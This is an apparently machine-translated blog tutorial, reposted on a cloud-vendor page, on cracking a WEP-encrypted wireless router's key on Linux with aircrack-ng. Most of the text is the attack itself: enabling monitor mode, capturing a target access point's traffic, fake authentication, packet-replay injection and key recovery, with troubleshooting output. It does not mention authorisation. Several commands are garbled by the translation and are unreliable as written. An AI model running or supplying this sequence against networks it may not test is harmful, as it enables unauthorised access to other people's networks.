Cracking vro WEP encryption in Linux

Source: Internet
Author: User
Tags bssid

System: Archlinux, wireless network card: TP-LINK321G +, encryption method: WEP

Preparations before cracking:

Install aircrack-ng and install iw (as required)

Cracking Process:

1. Start the monitoring mode of the wireless network card and run it in the terminal (wlan0 is the port of the wireless network card, you can enter ifconfig-a in the terminal to view)

$ Sudo airmon-ng start wlan0

2. Check which wep-encrypted routers (APS) are online and their details (the wireless network port is mon0 after the monitoring mode is enabled)

$ Sudo airodump-ng mon0

Press ctrl + c to exit and retain the terminal.

3. Open another terminal to run

$ Sudo airodump-ng-c 6 -- bssid APs MAC-w wep mon0
6 is the channel of the AP, APsMAC is the MAC address of the router, and wep is the file name of the captured DATA packet

4. Open another terminal to establish a virtual connection with the AP

$ Sudo aireplay-ng-1 0-a APs MAC-h My MAC mon0
5. Run

$ Sudo aireplay-ng-2-F-p 0841-c ff: ff-B APs MAC-h My MAC mon0

Looking back at the terminal in step 3, is DATA starting to soar?

6. Collect more than 5000 pieces of DATA and start decryption. Open another terminal to run

$ Sudo aircrack-ng wep *. cap


If the password is not calculated for the time being, the aircrack-ng will automatically run again after each additional 5000 DATA entries until the password is calculated.

7. disable monitoring after successful cracking

$ Sudo airmon-ng stop mon0

My problems and solutions:

Step 1: Display

ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2
Install iw as prompted.

Step 4: If the virtual connection is successful, it should be displayed

12:52:28 Waiting for beacon frame (BSSID: 00: 19: E0: XX) on channel 8

12:52:28 Sending Authentication Request (Open System) [ACK]
12:52:28 Authentication successful
12:52:28 Sending Association Request [ACK]
12:52:29 Association successful :-) (AID: 1)
But I keep repeating the display.

13:04:56 Waiting for beacon frame (BSSID: 00: 19: E0: XX) on channel 8

13:04:56 Sending Authentication Request (Open System) [ACK]
13:04:56 Authentication successful
13:04:56 Sending Association Request [ACK]
13:04:57 Got a deauthentication packet! (Waiting 3 seconds)
It doesn't matter. Open another terminal and continue step 5 (after several long or short cycles, the virtual connection may also be successful)

I tried again several times and found that the DATA in front of Step 5 may not necessarily "Soar". The reason is unknown. Maybe the signal is bad?

If DATA grows slowly, it will be difficult to crack, so we have to try again several times.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.